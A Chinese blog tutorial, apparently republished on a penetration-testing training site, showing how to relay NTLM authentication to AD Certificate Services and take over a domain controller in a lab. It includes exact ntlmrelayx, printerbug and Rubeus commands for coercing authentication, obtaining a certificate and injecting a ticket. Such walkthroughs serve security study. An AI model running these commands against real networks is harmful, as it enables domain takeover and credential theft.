1. 首页
  2. 渗透测试

攻击AD证书服务获取域控权限

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

moonsec 2021年11月21日 pm2:19 渗透测试 阅读 3856

前言

当AD安装证书服务后,存在一个HTTP端点:

攻击AD证书服务获取域控权限

攻击者可以利用NTLM Over HTTP来进行ntlmrelay攻击。

详细的介绍可以参考:https://posts.specterops.io/certified-pre-owned-d95910965cd2

环境介绍

攻击机器:192.168.8.164

AD域控(SRV-DC):192.168.8.144

AD辅域(SRV-DC2):192.168.8.155

攻击流程

默认普通用户普通权限:

攻击AD证书服务获取域控权限

使用impacket,更新下这里的pull:

https://github.com/SecureAuthCorp/impacket/pull/1101

攻击机器开启监听:

ntlmrelayx.py -t http://192.168.8.144/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller'

注意,这里的template参数值得做好适配。

利用打印机服务,使辅域进行强连回来:

python printerbug.py domain.org/user:password@192.168.8.155 192.168.8.164

ntlmrelayx成功进行relay,并获取到证书信息:

攻击AD证书服务获取域控权限

利用证书获取tgt并注入:

Rubeus.exe asktgt /user:SRV-DC2$ /certificate:certificatebase64body /ptt

攻击AD证书服务获取域控权限

成功dump hash:

攻击AD证书服务获取域控权限

上述攻击流程中,除了我标粗的需要注意以外,还需要注意不能relay给自身、子域没权限也不能relay。(感谢daiker)

利用类似打印机服务手法进行ntlmrelay攻击时,除了上述提到的攻击AD CS,还有非约束委派、 CVE-2019-1040的基于资源的约束委派等攻击手法,详细可查看我发表在TSRC的另外一篇文章:红蓝对抗之Windows内网渗透

本文来自https://cloud.tencent.com/developer/article/1863648,经授权后发布,本文观点不代表立场,转载请联系原作者。

(2)
moonsec moonsec
0
Linux软连接ssh后门之我见
« 上一篇 2021年10月20日 pm6:57
Cobalt Strike 的特征与隐藏
下一篇 » 2021年12月24日 am1:13

相关推荐

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息